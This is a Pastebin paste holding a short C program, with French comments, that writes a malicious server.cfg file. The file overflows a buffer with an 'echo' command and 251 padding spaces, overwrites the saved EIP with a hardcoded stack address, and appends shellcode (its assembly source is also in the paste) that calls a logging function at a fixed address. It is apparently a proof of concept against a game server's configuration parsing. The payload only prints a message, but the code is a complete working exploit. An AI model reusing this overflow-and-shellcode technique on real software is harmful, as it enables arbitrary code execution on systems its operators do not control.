Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <iostream>
- // http://sasuke78200.blogspot.fr/
- /*
- Le code source du shellcode
- USE32
- _start:
- call _getStrAddr
- _logprintf:
- pop ebx ; pop the last EIP (which is now the address of the string "Hi this is a buffer overflow !") on ebx
- sub esp, 0x80 ; adjust esp
- push 0x00000000 ; push 0
- push ebx ; push offset "Hi this is a buffer overflow !"
- mov eax, 0x427B60 ; eax = logprintf
- call eax ; call logprintf
- add esp, 0x80 ; readjust esp
- jmp _start ; restart
- _getStrAddr:
- call _logprintf
- db "Hi this is a buffer overflow !"
- db 0
- */
- int main()
- {
- FILE* fServerCfg;
- int i;
- char aShellCode[] = // le shellcode
- {
- 0xE8, 0x19, 0x00, 0x00, 0x00, 0x5B, 0x81, 0xEC, 0x80, 0x00, 0x00, 0x00,
- 0x6A, 0x00, 0x53, 0xB8, 0x60, 0x7B, 0x42, 0x00, 0xFF, 0xD0, 0x81, 0xC4,
- 0x80, 0x00, 0x00, 0x00, 0xEB, 0xE2, 0xE8, 0xE2, 0xFF, 0xFF, 0xFF, 0x48,
- 0x69, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x69, 0x73, 0x20, 0x61, 0x20,
- 0x62, 0x75, 0x66, 0x66, 0x65, 0x72, 0x20, 0x6F, 0x76, 0x65, 0x72, 0x66,
- 0x6C, 0x6F, 0x77, 0x20, 0x21, 0x00
- };
- fServerCfg = fopen("./server.cfg", "wb");
- if(fServerCfg)
- {
- fwrite("echo ", 5, 1, fServerCfg);
- for(i = 0; i < 251; i++)
- {
- fputc(0x20, fServerCfg); // dépassement de taille du buffer
- }
- fwrite("\x20\xFD\x12\x00", 4, 1, fServerCfg); // écrasement de l'EIP
- fwrite(aShellCode, sizeof(aShellCode), 1, fServerCfg); // écriture du shellcode
- fclose(fServerCfg);
- }
- return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement